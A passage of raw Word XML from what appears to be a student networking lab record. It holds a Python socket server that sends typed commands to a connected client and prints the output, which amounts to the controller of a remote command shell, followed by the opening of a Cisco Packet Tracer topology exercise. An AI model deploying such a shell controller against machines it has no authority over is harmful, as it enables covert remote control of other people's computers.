      <w:r w:rsidRPr="006D5E2F">
        <w:t>import threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EBEE60" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t>host = '127.0.0.1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2482D5" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t>port = 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5CA96C" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>create_server_socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DC7F9B" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">    server = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>socket.socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>socket.AF_INET</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>socket.SOCK_STREAM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B184263" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>server.bind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>((host, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB7AB14" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>server.listen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2AF34F" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">    print(f"[+] Listening on {host}:{port}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C4FDC2" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">    return server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09061F27" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>handle_client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">(conn, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE5E220" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">    print(f"[+] Connection established with {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>[0]}:{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>[1]}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7020BFFC" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">    while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33722900" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9BA19E" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">            command = input(f"{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>[0]}@shell&gt; ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16940238" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">            if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>command.lower</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>() == 'quit':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4725CD53" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>conn.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>command.encode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1042BEB9" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>conn.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9B8351" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">                break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48099889" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">            if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>command.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332D9F01" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>conn.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>command.encode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7839BE07" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">                response = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>conn.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>(4096).decode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3C1C7C" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">                print(response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1DAA52" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">        except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401BED7F" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">            print(f"[!] Error: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A72F596" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>conn.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774423CD" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">            break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0516E3F6" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>start_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A34181A" w14:textId="75C1996E" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="000A1EBB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve"> server = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>create_server_socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8D7F14" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">    while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E50EFBE" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">        conn, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>server.accept</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220A1ED2" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>client_thread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>threading.Thread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>(target=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>handle_client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">=(conn, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794D2D1C" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>client_thread.start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49162DEE" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ECEE4E" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>start_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2667E263" w14:textId="77777777" w:rsidR="007414E7" w:rsidRDefault="007414E7" w:rsidP="007414E7"/>
    <w:p w14:paraId="0D34A4A6" w14:textId="5344BC24" w:rsidR="000A1EBB" w:rsidRDefault="000A1EBB" w:rsidP="007414E7">
      <w:r w:rsidRPr="000A1EBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A364F6" w14:textId="0941348F" w:rsidR="000A1EBB" w:rsidRDefault="00126309" w:rsidP="007414E7">
      <w:r w:rsidRPr="00126309">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06987688" w14:textId="7B98672A" w:rsidR="00194523" w:rsidRDefault="005B5C15" w:rsidP="007414E7">
      <w:r w:rsidRPr="005B5C15">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20BAB4E4" wp14:editId="5F47B9F3">
            <wp:extent cx="5731510" cy="1506855"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="29966902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69021" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1506855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="166FE003" w14:textId="7B354594" w:rsidR="005B5C15" w:rsidRDefault="00983C06" w:rsidP="007414E7">
      <w:r w:rsidRPr="00983C06">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45BB2DCF" wp14:editId="7C4B414C">
            <wp:extent cx="5731510" cy="4051935"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="159546038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60389" name="Picture 1" descr="A computer screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4051935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D06237" w14:textId="570E83F5" w:rsidR="00126309" w:rsidRDefault="00126309" w:rsidP="007414E7"/>
    <w:p w14:paraId="34F50421" w14:textId="77777777" w:rsidR="00194523" w:rsidRDefault="00194523" w:rsidP="007414E7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BAF3B08" w14:textId="380F1067" w:rsidR="000A1EBB" w:rsidRDefault="00194523" w:rsidP="007414E7">
      <w:r w:rsidRPr="00194523">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCA12BF" w14:textId="77777777" w:rsidR="00685D85" w:rsidRDefault="00685D85" w:rsidP="007414E7"/>
    <w:p w14:paraId="25AA3D87" w14:textId="026EBB84" w:rsidR="00194523" w:rsidRDefault="00F82BF7" w:rsidP="007414E7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00872A22">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00685D85" w:rsidRPr="00685D85">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="778F1F09" wp14:editId="31032BE6">
            <wp:extent cx="5731510" cy="654050"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="116078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81318" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="654050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69547B70" w14:textId="77777777" w:rsidR="00685D85" w:rsidRDefault="00685D85" w:rsidP="007414E7"/>
    <w:p w14:paraId="35647391" w14:textId="77777777" w:rsidR="00685D85" w:rsidRDefault="00685D85" w:rsidP="007414E7"/>
    <w:p w14:paraId="7665B70D" w14:textId="061E60BA" w:rsidR="00685D85" w:rsidRDefault="00685D85" w:rsidP="007414E7">
      <w:r w:rsidRPr="00685D85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA9516F" w14:textId="4DCE0D03" w:rsidR="00095CC2" w:rsidRDefault="00095CC2" w:rsidP="00095CC2">
      <w:r w:rsidRPr="00095CC2">
        <w:t>Server shows a “connection established” message when client connects. Commands typed at the server prompt run on the client and their output appears on the server.cd changes the client’s directory and the new path is returned. Quit ends the session; errors close the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519FEDC7" w14:textId="77777777" w:rsidR="00095CC2" w:rsidRDefault="00095CC2" w:rsidP="00095CC2"/>
    <w:p w14:paraId="6170BDF6" w14:textId="77777777" w:rsidR="00095CC2" w:rsidRDefault="00095CC2" w:rsidP="00095CC2"/>
    <w:p w14:paraId="71D9CCF7" w14:textId="05F611AC" w:rsidR="00FE0C2B" w:rsidRPr="00095CC2" w:rsidRDefault="00C30E67" w:rsidP="00C30E67">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00C30E67">
        <w:t>DESIGN A SIMPLE TOPOLOGY AND CONFIGURE WITH ONE ROUTER, TWO SWITCHES AND PCS USING CISCO PACKET TRACER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7B499B" w14:textId="77777777" w:rsidR="00685D85" w:rsidRDefault="00685D85" w:rsidP="007414E7"/>
    <w:p w14:paraId="2E618701" w14:textId="46E379CB" w:rsidR="00DA2DA0" w:rsidRDefault="00DA2DA0" w:rsidP="007414E7">
      <w:r>
        <w:t>Ex.</w:t>
      </w:r>
      <w:r w:rsidR="009B0803">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>No:</w:t>
      </w:r>
      <w:r w:rsidR="009B0803">
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1F293B" w14:textId="77777777" w:rsidR="00DA2DA0" w:rsidRDefault="00DA2DA0" w:rsidP="007414E7"/>
    <w:p w14:paraId="3ED2F147" w14:textId="7DA40AF4" w:rsidR="00583C36" w:rsidRPr="00583C36" w:rsidRDefault="00583C36" w:rsidP="00583C36">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00583C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00112EA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>m:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7EFD72" w14:textId="77777777" w:rsidR="00583C36" w:rsidRPr="00583C36" w:rsidRDefault="00583C36" w:rsidP="00583C36">
      <w:r w:rsidRPr="00583C36">
        <w:t xml:space="preserve">To design and configure a simple network topology using </w:t>
      </w:r>
      <w:r w:rsidRPr="00583C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>one router, two switches, and PCs</w:t>
      </w:r>
      <w:r w:rsidRPr="00583C36">
        <w:t xml:space="preserve"> in Cisco Packet Tracer and verify successful communication between networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCDD149" w14:textId="08807E49" w:rsidR="00583C36" w:rsidRPr="00583C36" w:rsidRDefault="00583C36" w:rsidP="00583C36"/>
    <w:p w14:paraId="31E2B350" w14:textId="5085644C" w:rsidR="00583C36" w:rsidRPr="00583C36" w:rsidRDefault="00583C36" w:rsidP="00583C36">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00583C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00112EA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ntroduction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6105DD13" w14:textId="77777777" w:rsidR="00583C36" w:rsidRPr="00583C36" w:rsidRDefault="00583C36" w:rsidP="00583C36">
      <w:r w:rsidRPr="00583C36">
        <w:t>In networking, routers are used to connect multiple networks.</w:t>
      </w:r>
      <w:r w:rsidRPr="00583C36">
        <w:br/>
        <w:t>Switches connect devices within a single LAN.</w:t>
      </w:r>
      <w:r w:rsidRPr="00583C36">
        <w:br/>
        <w:t>In this experiment, two LANs (connected by switches) are linked using a router.</w:t>
      </w:r>
      <w:r w:rsidRPr="00583C36">
        <w:br/>
        <w:t>Each LAN will have its own IP network, and the router will route packets between them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1628F68C" w14:textId="77777777" w:rsidR="00DA2DA0" w:rsidRDefault="00DA2DA0" w:rsidP="007414E7"/>
    <w:p w14:paraId="59C77FFC" w14:textId="5586A646" w:rsidR="00685D85" w:rsidRDefault="00DB13EE" w:rsidP="007414E7">
      <w:r w:rsidRPr="00DB13EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Algorithm</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
